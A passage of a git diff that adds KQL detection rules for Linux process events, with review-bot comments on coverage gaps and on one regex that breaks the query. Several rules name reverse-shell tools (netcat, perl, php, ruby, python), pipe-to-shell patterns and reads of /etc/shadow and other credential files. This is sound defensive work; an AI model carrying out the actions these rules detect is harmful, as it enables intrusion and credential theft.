+// False Positives:
+// - Legitimate software that uses these patterns
+
+DeviceProcessEvents
+| where (ProcessCommandLine startswith "sh -c " or ProcessCommandLine startswith "bash -c ") and ((ProcessCommandLine contains "| bash " or ProcessCommandLine contains "| sh " or ProcessCommandLine contains "|bash " or ProcessCommandLine contains "|sh ") or (ProcessCommandLine endswith "| bash" or ProcessCommandLine endswith "| sh" or ProcessCommandLine endswith "|bash" or ProcessCommandLine endswith " |sh"))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/linux_sudo_chroot_execution.kql b/KQL/rules/linux/process_creation/linux_sudo_chroot_execution.kql
new file mode 100644
index 00000000..b199634d
--- /dev/null
+++ b/KQL/rules/linux/process_creation/linux_sudo_chroot_execution.kql
@@ -0,0 +1,15 @@
+// Title: Linux Sudo Chroot Execution
+// Author: Swachchhanda Shrawn Poudel (Nextron Systems)
+// Date: 2025-10-02
+// Level: low
+// Description: Detects the execution of 'sudo' command with '--chroot' option, which is used to change the root directory for command execution.
+// Attackers may use this technique to evade detection and execute commands in a modified environment.
+// This can be part of a privilege escalation strategy, as it allows the execution of commands with elevated privileges in a controlled environment as seen in CVE-2025-32463.
+// While investigating, look out for unusual or unexpected use of 'sudo --chroot' in conjunction with other commands or scripts such as execution from temporary directories or unusual user accounts.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1068
+// False Positives:
+// - Legitimate administrative tasks or scripts that use 'sudo --chroot' for containerization, testing, or system management.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " --chroot " or ProcessCommandLine contains "sudo -R ") and FolderPath endswith "/sudo"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/linux_webshell_indicators.kql b/KQL/rules/linux/process_creation/linux_webshell_indicators.kql
new file mode 100644
index 00000000..87162cc1
--- /dev/null
+++ b/KQL/rules/linux/process_creation/linux_webshell_indicators.kql
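Review bot: The command-line terms in the final `where` clause only match the spaced form `" --chroot "` and the literal prefix `"sudo -R "`, so the equals form sudo's own option syntax documents (`--chroot=DIR`) and a short option bundled with other flags (`-nR DIR`, for instance) produce no match even though the FolderPath anchor already limits the rule to sudo. A broader but still cheap variant would be `(ProcessCommandLine contains " --chroot " or ProcessCommandLine contains " --chroot=" or ProcessCommandLine matches regex @"\s-[a-zA-Z]*R\s") and FolderPath endswith "/sudo"`. The header text already names CVE-2025-32463 as the motivating case, so the rule's own description promises more coverage than the two literal terms deliver; if the upstream Sigma selection is deliberately narrow, a header comment saying so would help whoever tunes this later.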
@@ -0,0 +1,12 @@
+// Title: Linux Webshell Indicators
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-10-15
+// Level: high
+// Description: Detects suspicious sub processes of web server processes
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.003
+// False Positives:
+// - Web applications that invoke Linux command line tools
+
+DeviceProcessEvents
+| where ((InitiatingProcessFolderPath endswith "/httpd" or InitiatingProcessFolderPath endswith "/lighttpd" or InitiatingProcessFolderPath endswith "/nginx" or InitiatingProcessFolderPath endswith "/apache2" or InitiatingProcessFolderPath endswith "/node" or InitiatingProcessFolderPath endswith "/caddy") or (InitiatingProcessCommandLine contains "/bin/java" and InitiatingProcessCommandLine contains "tomcat") or (InitiatingProcessCommandLine contains "/bin/java" and InitiatingProcessCommandLine contains "websphere")) and (FolderPath endswith "/whoami" or FolderPath endswith "/ifconfig" or FolderPath endswith "/ip" or FolderPath endswith "/bin/uname" or FolderPath endswith "/bin/cat" or FolderPath endswith "/bin/crontab" or FolderPath endswith "/hostname" or FolderPath endswith "/iptables" or FolderPath endswith "/netstat" or FolderPath endswith "/pwd" or FolderPath endswith "/route")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/local_groups_discovery_linux.kql b/KQL/rules/linux/process_creation/local_groups_discovery_linux.kql
new file mode 100644
index 00000000..ee1f4093
--- /dev/null
+++ b/KQL/rules/linux/process_creation/local_groups_discovery_linux.kql
@@ -0,0 +1,12 @@
+// Title: Local Groups Discovery - Linux
+// Author: Ömer Günal, Alejandro Ortuno, oscd.community
+// Date: 2020-10-11
+// Level: low
+// Description: Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1069.001
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/groups" or (ProcessCommandLine contains "/etc/group" and (FolderPath endswith "/cat" or FolderPath endswith "/ed" or FolderPath endswith "/head" or FolderPath endswith "/less" or FolderPath endswith "/more" or FolderPath endswith "/nano" or FolderPath endswith "/tail" or FolderPath endswith "/vi" or FolderPath endswith "/vim"))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/local_system_accounts_discovery_linux.kql b/KQL/rules/linux/process_creation/local_system_accounts_discovery_linux.kql
new file mode 100644
index 00000000..d29fa812
--- /dev/null
+++ b/KQL/rules/linux/process_creation/local_system_accounts_discovery_linux.kql
@@ -0,0 +1,12 @@
+// Title: Local System Accounts Discovery - Linux
+// Author: Alejandro Ortuno, oscd.community, CheraghiMilad
+// Date: 2020-10-08
+// Level: low
+// Description: Detects enumeration of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.001
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/lastlog" or ProcessCommandLine contains "'x:0:'" or ((ProcessCommandLine contains "/etc/passwd" or ProcessCommandLine contains "/etc/shadow" or ProcessCommandLine contains "/etc/sudoers" or ProcessCommandLine contains "/etc/spwd.db" or ProcessCommandLine contains "/etc/pwd.db" or ProcessCommandLine contains "/etc/master.passwd") and (FolderPath endswith "/cat" or FolderPath endswith "/ed" or FolderPath endswith "/head" or FolderPath endswith "/more" or FolderPath endswith "/nano" or FolderPath endswith "/tail" or FolderPath endswith "/vi" or FolderPath endswith "/vim" or FolderPath endswith "/less" or FolderPath endswith "/emacs" or FolderPath endswith "/sqlite3" or FolderPath endswith "/makemap")) or FolderPath endswith "/id" or (ProcessCommandLine contains "-u" and FolderPath endswith "/lsof")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/mask_system_power_settings_via_systemctl.kql b/KQL/rules/linux/process_creation/mask_system_power_settings_via_systemctl.kql
new file mode 100644
index 00000000..f5056c4c
--- /dev/null
+++ b/KQL/rules/linux/process_creation/mask_system_power_settings_via_systemctl.kql
@@ -0,0 +1,14 @@
+// Title: Mask System Power Settings Via Systemctl
+// Author: Milad Cheraghi, Nasreddine Bencherchali
+// Date: 2025-10-17
+// Level: high
+// Description: Detects the use of systemctl mask to disable system power management targets such as suspend, hibernate, or hybrid sleep.
+// Adversaries may mask these targets to prevent a system from entering sleep or shutdown states, ensuring their malicious processes remain active and uninterrupted.
+// This behavior can be associated with persistence or defense evasion, as it impairs normal system power operations to maintain long-term access or avoid termination of malicious activity.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.impact, attack.t1653
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "suspend.target" or ProcessCommandLine contains "hibernate.target" or ProcessCommandLine contains "hybrid-sleep.target") and (ProcessCommandLine contains " mask" and FolderPath endswith "/systemctl")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/mount_execution_with_hidepid_parameter.kql b/KQL/rules/linux/process_creation/mount_execution_with_hidepid_parameter.kql
new file mode 100644
index 00000000..051b1a74
--- /dev/null
+++ b/KQL/rules/linux/process_creation/mount_execution_with_hidepid_parameter.kql
@@ -0,0 +1,10 @@
+// Title: Mount Execution With Hidepid Parameter
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-01-12
+// Level: medium
+// Description: Detects execution of the "mount" command with "hidepid" parameter to make invisible processes to other users from the system
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.defense-evasion, attack.t1564
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "hidepid=2" and ProcessCommandLine contains " -o ") and FolderPath endswith "/mount"
\ No newline at end of file
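Review bot: In the mount rule's `where` clause, `ProcessCommandLine contains "hidepid=2"` only covers the numeric spelling; proc(5) documents the named value `hidepid=invisible` as the equivalent of `2` on kernels from 5.8 onward, so a mount using the named form is not detected even though the header says the rule targets the hidepid parameter generally. Extending the first term to `(ProcessCommandLine contains "hidepid=2" or ProcessCommandLine contains "hidepid=invisible")` closes that gap without touching the `" -o "` and `/mount` anchors. If the numeric-only match is inherited verbatim from the upstream Sigma rule, a one-line header note stating that would explain the narrower scope to whoever tunes it.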
diff --git a/KQL/rules/linux/process_creation/named_pipe_created_via_mkfifo.kql b/KQL/rules/linux/process_creation/named_pipe_created_via_mkfifo.kql
new file mode 100644
index 00000000..bc0c6ea5
--- /dev/null
+++ b/KQL/rules/linux/process_creation/named_pipe_created_via_mkfifo.kql
@@ -0,0 +1,10 @@
+// Title: Named Pipe Created Via Mkfifo
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: low
+// Description: Detects the creation of a new named pipe using the "mkfifo" utility
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where FolderPath endswith "/mkfifo"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/nohup_execution.kql b/KQL/rules/linux/process_creation/nohup_execution.kql
new file mode 100644
index 00000000..e2fa1204
--- /dev/null
+++ b/KQL/rules/linux/process_creation/nohup_execution.kql
@@ -0,0 +1,12 @@
+// Title: Nohup Execution
+// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
+// Date: 2022-06-06
+// Level: medium
+// Description: Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.004
+// False Positives:
+// - Administrators or installed processes that leverage nohup
+
+DeviceProcessEvents
+| where FolderPath endswith "/nohup"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/os_architecture_discovery_via_grep.kql b/KQL/rules/linux/process_creation/os_architecture_discovery_via_grep.kql
new file mode 100644
index 00000000..b1f77a44
--- /dev/null
+++ b/KQL/rules/linux/process_creation/os_architecture_discovery_via_grep.kql
@@ -0,0 +1,10 @@
+// Title: OS Architecture Discovery Via Grep
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: low
+// Description: Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo"
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "aarch64" or ProcessCommandLine endswith "arm" or ProcessCommandLine endswith "i386" or ProcessCommandLine endswith "i686" or ProcessCommandLine endswith "mips" or ProcessCommandLine endswith "x86_64") and FolderPath endswith "/grep"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/pnscan_binary_data_transmission_activity.kql b/KQL/rules/linux/process_creation/pnscan_binary_data_transmission_activity.kql
new file mode 100644
index 00000000..28e31d44
--- /dev/null
+++ b/KQL/rules/linux/process_creation/pnscan_binary_data_transmission_activity.kql
@@ -0,0 +1,11 @@
+// Title: Pnscan Binary Data Transmission Activity
+// Author: David Burkett (@signalblur)
+// Date: 2024-04-16
+// Level: medium
+// Description: Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network.
+// This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "-(W|R)\\s?(\\s|"|')([0-9a-fA-F]{2}\\s?){2,20}(\\s|"|')"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/potential_container_discovery_via_inodes_listing.kql b/KQL/rules/linux/process_creation/potential_container_discovery_via_inodes_listing.kql
new file mode 100644
index 00000000..8b394baf
--- /dev/null
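Review bot: The regex literal in the pnscan rule's `where` clause is not a valid KQL string: it is delimited by double quotes but contains two unescaped `"` inside each `(\\s|"|')` group, so the literal terminates early and the whole query fails to parse rather than silently matching less. Escape them as `\"`, i.e. `| where ProcessCommandLine matches regex "-(W|R)\\s?(\\s|\"|')([0-9a-fA-F]{2}\\s?){2,20}(\\s|\"|')"`, or switch to a verbatim `@"..."` literal with the inner quotes doubled. Since this file is generated, the same escaping gap presumably lives in the converter that emitted it (not in this hunk), and any other upstream regex containing a literal double quote will hit it too, so the fix belongs there as well.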
+++ b/KQL/rules/linux/process_creation/potential_container_discovery_via_inodes_listing.kql
@@ -0,0 +1,13 @@
+// Title: Potential Container Discovery Via Inodes Listing
+// Author: Seth Hanford
+// Date: 2023-08-23
+// Level: low
+// Description: Detects listing of the inodes of the "/" directory to determine if the we are running inside of a container.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+// False Positives:
+// - Legitimate system administrator usage of these commands
+// - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith " /" or ProcessCommandLine contains " / ") and FolderPath endswith "/ls" and ProcessCommandLine matches regex "(?:\\s-[^-\\s]{0,20}d|\\s--directory\\s)" and ProcessCommandLine matches regex "(?:\\s-[^-\\s]{0,20}i|\\s--inode\\s)"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/potential_discovery_activity_using_find_linux.kql b/KQL/rules/linux/process_creation/potential_discovery_activity_using_find_linux.kql
new file mode 100644
index 00000000..7603ebc3
--- /dev/null
+++ b/KQL/rules/linux/process_creation/potential_discovery_activity_using_find_linux.kql
@@ -0,0 +1,10 @@
+// Title: Potential Discovery Activity Using Find - Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-28
+// Level: medium
+// Description: Detects usage of "find" binary in a suspicious manner to perform discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-perm -4000" or ProcessCommandLine contains "-perm -2000" or ProcessCommandLine contains "-perm 0777" or ProcessCommandLine contains "-perm -222" or ProcessCommandLine contains "-perm -o w" or ProcessCommandLine contains "-perm -o x" or ProcessCommandLine contains "-perm -u=s" or ProcessCommandLine contains "-perm -g=s") and FolderPath endswith "/find"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/potential_gobrat_file_discovery_via_grep.kql b/KQL/rules/linux/process_creation/potential_gobrat_file_discovery_via_grep.kql
new file mode 100644
index 00000000..6e9c3014
--- /dev/null
+++ b/KQL/rules/linux/process_creation/potential_gobrat_file_discovery_via_grep.kql
@@ -0,0 +1,10 @@
+// Title: Potential GobRAT File Discovery Via Grep
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: high
+// Description: Detects the use of grep to discover specific files created by the GobRAT malware
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "apached" or ProcessCommandLine contains "frpc" or ProcessCommandLine contains "sshd.sh" or ProcessCommandLine contains "zone.arm") and FolderPath endswith "/grep"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/potential_linux_amazon_ssm_agent_hijacking.kql b/KQL/rules/linux/process_creation/potential_linux_amazon_ssm_agent_hijacking.kql
new file mode 100644
index 00000000..6c7f97e0
--- /dev/null
+++ b/KQL/rules/linux/process_creation/potential_linux_amazon_ssm_agent_hijacking.kql
@@ -0,0 +1,12 @@
+// Title: Potential Linux Amazon SSM Agent Hijacking
+// Author: Muhammad Faisal
+// Date: 2023-08-03
+// Level: medium
+// Description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.persistence, attack.t1219.002
+// False Positives:
+// - Legitimate activity of system administrators
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-register " and ProcessCommandLine contains "-code " and ProcessCommandLine contains "-id " and ProcessCommandLine contains "-region ") and FolderPath endswith "/amazon-ssm-agent"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/potential_linux_process_code_injection_via_dd_utility.kql b/KQL/rules/linux/process_creation/potential_linux_process_code_injection_via_dd_utility.kql
new file mode 100644
index 00000000..448dc75f
--- /dev/null
+++ b/KQL/rules/linux/process_creation/potential_linux_process_code_injection_via_dd_utility.kql
@@ -0,0 +1,10 @@
+// Title: Potential Linux Process Code Injection Via DD Utility
+// Author: Joseph Kamau
+// Date: 2023-12-01
+// Level: medium
+// Description: Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.009
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "of=" and ProcessCommandLine contains "/proc/" and ProcessCommandLine contains "/mem") and FolderPath endswith "/dd"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/potential_netcat_reverse_shell_execution.kql b/KQL/rules/linux/process_creation/potential_netcat_reverse_shell_execution.kql
new file mode 100644
index 00000000..12da21c2
--- /dev/null
+++ b/KQL/rules/linux/process_creation/potential_netcat_reverse_shell_execution.kql
@@ -0,0 +1,12 @@
+// Title: Potential Netcat Reverse Shell Execution
+// Author: @d4ns4n_, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-07
+// Level: high
+// Description: Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -c " or ProcessCommandLine contains " -e ") and (FolderPath endswith "/nc" or FolderPath endswith "/ncat") and (ProcessCommandLine contains " ash" or ProcessCommandLine contains " bash" or ProcessCommandLine contains " bsh" or ProcessCommandLine contains " csh" or ProcessCommandLine contains " ksh" or ProcessCommandLine contains " pdksh" or ProcessCommandLine contains " sh" or ProcessCommandLine contains " tcsh" or ProcessCommandLine contains "/bin/ash" or ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/bsh" or ProcessCommandLine contains "/bin/csh" or ProcessCommandLine contains "/bin/ksh" or ProcessCommandLine contains "/bin/pdksh" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/tcsh" or ProcessCommandLine contains "/bin/zsh" or ProcessCommandLine contains "$IFSash" or ProcessCommandLine contains "$IFSbash" or ProcessCommandLine contains "$IFSbsh" or ProcessCommandLine contains "$IFScsh" or ProcessCommandLine contains "$IFSksh" or ProcessCommandLine contains "$IFSpdksh" or ProcessCommandLine contains "$IFSsh" or ProcessCommandLine contains "$IFStcsh" or ProcessCommandLine contains "$IFSzsh")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/potential_perl_reverse_shell_execution.kql b/KQL/rules/linux/process_creation/potential_perl_reverse_shell_execution.kql
new file mode 100644
index 00000000..5c8bb537
--- /dev/null
+++ b/KQL/rules/linux/process_creation/potential_perl_reverse_shell_execution.kql
@@ -0,0 +1,12 @@
+// Title: Potential Perl Reverse Shell Execution
+// Author: @d4ns4n_, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-07
+// Level: high
+// Description: Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "fdopen(" and ProcessCommandLine contains "::Socket::INET") or (ProcessCommandLine contains "Socket" and ProcessCommandLine contains "connect" and ProcessCommandLine contains "open" and ProcessCommandLine contains "exec")) and (ProcessCommandLine contains " -e " and FolderPath endswith "/perl")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/potential_php_reverse_shell.kql b/KQL/rules/linux/process_creation/potential_php_reverse_shell.kql
new file mode 100644
index 00000000..a07b6c4a
--- /dev/null
+++ b/KQL/rules/linux/process_creation/potential_php_reverse_shell.kql
@@ -0,0 +1,11 @@
+// Title: Potential PHP Reverse Shell
+// Author: @d4ns4n_
+// Date: 2023-04-07
+// Level: high
+// Description: Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets.
+// Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "ash" or ProcessCommandLine contains "bash" or ProcessCommandLine contains "bsh" or ProcessCommandLine contains "csh" or ProcessCommandLine contains "ksh" or ProcessCommandLine contains "pdksh" or ProcessCommandLine contains "sh" or ProcessCommandLine contains "tcsh" or ProcessCommandLine contains "zsh") and (ProcessCommandLine contains " -r " and ProcessCommandLine contains "fsockopen") and FolderPath contains "/php"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/potential_ruby_reverse_shell.kql b/KQL/rules/linux/process_creation/potential_ruby_reverse_shell.kql
new file mode 100644
index 00000000..402db2cf
--- /dev/null
+++ b/KQL/rules/linux/process_creation/potential_ruby_reverse_shell.kql
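Review bot: Every term in the first parenthesised group of the `where` clause (`"ash"`, `"bash"`, `"bsh"`, `"csh"`, `"ksh"`, `"pdksh"`, `"tcsh"`, `"zsh"`) contains the substring `"sh"`, so with `contains` the whole group collapses to `ProcessCommandLine contains "sh"` and the other eight terms add no selectivity; the rule therefore fires on any `php -r` invocation mentioning `fsockopen` whose command line has the letters `sh` anywhere, for example inside a hostname or variable name. Either reduce the group to the single term so the query states what it actually tests, or, if the intent is to see a real shell name, anchor the terms the way the netcat rule in this same commit does (`" bash"`, `"/bin/bash"`, and so on). A header comment noting that the shell list is effectively a single `sh` match would also stop the next reader from assuming it is more precise than it is.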
@@ -0,0 +1,10 @@
+// Title: Potential Ruby Reverse Shell
+// Author: @d4ns4n_
+// Date: 2023-04-07
+// Level: medium
+// Description: Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " ash" or ProcessCommandLine contains " bash" or ProcessCommandLine contains " bsh" or ProcessCommandLine contains " csh" or ProcessCommandLine contains " ksh" or ProcessCommandLine contains " pdksh" or ProcessCommandLine contains " sh" or ProcessCommandLine contains " tcsh") and (ProcessCommandLine contains " -e" and ProcessCommandLine contains "rsocket" and ProcessCommandLine contains "TCPSocket") and FolderPath contains "ruby"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/potential_suspicious_change_to_sensitive_critical_files.kql b/KQL/rules/linux/process_creation/potential_suspicious_change_to_sensitive_critical_files.kql
new file mode 100644
index 00000000..8a42af26
--- /dev/null
+++ b/KQL/rules/linux/process_creation/potential_suspicious_change_to_sensitive_critical_files.kql
@@ -0,0 +1,12 @@
+// Title: Potential Suspicious Change To Sensitive/Critical Files
+// Author: @d4ns4n_ (Wuerth-Phoenix)
+// Date: 2023-05-30
+// Level: medium
+// Description: Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux system.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1565.001
+// False Positives:
+// - Some false positives are to be expected on user or administrator machines. Apply additional filters as needed.
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains ">" and (FolderPath endswith "/cat" or FolderPath endswith "/echo" or FolderPath endswith "/grep" or FolderPath endswith "/head" or FolderPath endswith "/more" or FolderPath endswith "/tail")) or (FolderPath endswith "/emacs" or FolderPath endswith "/nano" or FolderPath endswith "/sed" or FolderPath endswith "/vi" or FolderPath endswith "/vim")) and (ProcessCommandLine contains "/bin/login" or ProcessCommandLine contains "/bin/passwd" or ProcessCommandLine contains "/boot/" or (ProcessCommandLine contains "/etc/" and ProcessCommandLine contains ".conf") or ProcessCommandLine contains "/etc/cron." or ProcessCommandLine contains "/etc/crontab" or ProcessCommandLine contains "/etc/hosts" or ProcessCommandLine contains "/etc/init.d" or ProcessCommandLine contains "/etc/sudoers" or ProcessCommandLine contains "/opt/bin/" or ProcessCommandLine contains "/sbin" or ProcessCommandLine contains "/usr/bin/" or ProcessCommandLine contains "/usr/local/bin/")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/potential_xterm_reverse_shell.kql b/KQL/rules/linux/process_creation/potential_xterm_reverse_shell.kql
new file mode 100644
index 00000000..2fd1ef34
--- /dev/null
+++ b/KQL/rules/linux/process_creation/potential_xterm_reverse_shell.kql
@@ -0,0 +1,10 @@
+// Title: Potential Xterm Reverse Shell
+// Author: @d4ns4n_
+// Date: 2023-04-24
+// Level: medium
+// Description: Detects usage of "xterm" as a potential reverse shell tunnel
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-display" and ProcessCommandLine endswith ":1" and FolderPath contains "xterm"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/potentially_suspicious_execution_from_tmp_folder.kql b/KQL/rules/linux/process_creation/potentially_suspicious_execution_from_tmp_folder.kql
new file mode 100644
index 00000000..eac2a502
--- /dev/null
+++ b/KQL/rules/linux/process_creation/potentially_suspicious_execution_from_tmp_folder.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Execution From Tmp Folder
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: medium
+// Description: Detects a potentially suspicious execution of a process located in the '/tmp/' folder
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
+| where FolderPath startswith "/tmp/" and (not(FolderPath endswith "/usr/bin/nextcloud"))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/potentially_suspicious_named_pipe_created_via_mkfifo.kql b/KQL/rules/linux/process_creation/potentially_suspicious_named_pipe_created_via_mkfifo.kql
new file mode 100644
index 00000000..d4000a62
--- /dev/null
+++ b/KQL/rules/linux/process_creation/potentially_suspicious_named_pipe_created_via_mkfifo.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Named Pipe Created Via Mkfifo
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: medium
+// Description: Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " /tmp/" and FolderPath endswith "/mkfifo"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/print_history_file_contents.kql b/KQL/rules/linux/process_creation/print_history_file_contents.kql
new file mode 100644
index 00000000..7e7fdd46
--- /dev/null
+++ b/KQL/rules/linux/process_creation/print_history_file_contents.kql
@@ -0,0 +1,12 @@
+// Title: Print History File Contents
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-06-20
+// Level: medium
+// Description: Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.t1592.004
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where (FolderPath endswith "/cat" or FolderPath endswith "/head" or FolderPath endswith "/tail" or FolderPath endswith "/more") and ((ProcessCommandLine contains "/.bash_history" or ProcessCommandLine contains "/.zsh_history") or (ProcessCommandLine endswith "_history" or ProcessCommandLine endswith ".history" or ProcessCommandLine endswith "zhistory"))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/pua_trufflehog_execution_linux.kql b/KQL/rules/linux/process_creation/pua_trufflehog_execution_linux.kql
new file mode 100644
index 00000000..719410cb
--- /dev/null
+++ b/KQL/rules/linux/process_creation/pua_trufflehog_execution_linux.kql
@@ -0,0 +1,14 @@
+// Title: PUA - TruffleHog Execution - Linux
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-09-24
+// Level: medium
+// Description: Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously.
+// While it is a legitimate tool, intended for use in CI pipelines and security assessments,
+// It was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.credential-access, attack.t1083, attack.t1552.001
+// False Positives:
+// - Legitimate use of TruffleHog by security teams or developers.
+
+DeviceProcessEvents
+| where FolderPath endswith "/trufflehog" or ((ProcessCommandLine contains " docker --image " or ProcessCommandLine contains " Git " or ProcessCommandLine contains " GitHub " or ProcessCommandLine contains " Jira " or ProcessCommandLine contains " Slack " or ProcessCommandLine contains " Confluence " or ProcessCommandLine contains " SharePoint " or ProcessCommandLine contains " s3 " or ProcessCommandLine contains " gcs ") and ProcessCommandLine contains " --results=verified")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/python_reverse_shell_execution_via_pty_and_socket_modules.kql b/KQL/rules/linux/process_creation/python_reverse_shell_execution_via_pty_and_socket_modules.kql
new file mode 100644
index 00000000..60bfc298
--- /dev/null
+++ b/KQL/rules/linux/process_creation/python_reverse_shell_execution_via_pty_and_socket_modules.kql
@@ -0,0 +1,10 @@
+// Title: Python Reverse Shell Execution Via PTY And Socket Modules
+// Author: @d4ns4n_, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-24
+// Level: high
+// Description: Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
